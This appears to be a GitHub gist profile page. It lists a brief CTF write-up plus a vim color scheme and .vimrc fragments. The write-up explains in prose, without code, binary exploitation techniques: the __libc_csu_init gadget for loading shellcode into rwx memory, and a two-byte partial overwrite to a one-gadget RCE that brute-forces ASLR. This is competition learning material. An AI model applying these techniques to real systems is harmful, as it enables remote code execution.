Skip to content

Instantly share code, notes, and snippets.

Avatar
🎯
Focusing

Paul PaulCher

🎯
Focusing
View GitHub Profile
View asis_ctf_writeup.md

start

By using the so called universal gadget from __libc_csu_init we can read shellcode into the rwx memory segment and return into it.

start hard

By executing read function we can overwrite only last two bytes of read to find something useful and defeat ASLR. Fortunately there is one-gadget RCE located at 0xf0567 in this version of libc, right near the read function (0xf6670). We overflow only last two bytes to defeat ASLR, so that only around 16 attemps needed, because of 4 bit entropy of ASLR.

EDIT: checkout another great solution proposed by agadeint in the comment section below, which is cleaner and does not require bruteforcing and one gadget.

View twilight.vim
" twilight256 color scheme file
" Maintainer: Neal Milstein - neal dot milstein at gmail dot com
" Last Change: 2011 Feb 1
"
" This theme copies the colors from the TextMate theme Twilight.
"
" The theme is designed to be used on a black background. I only tested it
" using a 256-color terminal; I do not think it will work on much else (gvim,
" 8-color terminal, etc.).
"
View .vimrc
" Line numeration
set noeb
set nu
" Use Vim settings, rather then Vi settings (much better!).
set nocompatible
" Turn on the verboseness to see everything vim is doing.
"set verbose=9
You can’t perform that action at this time.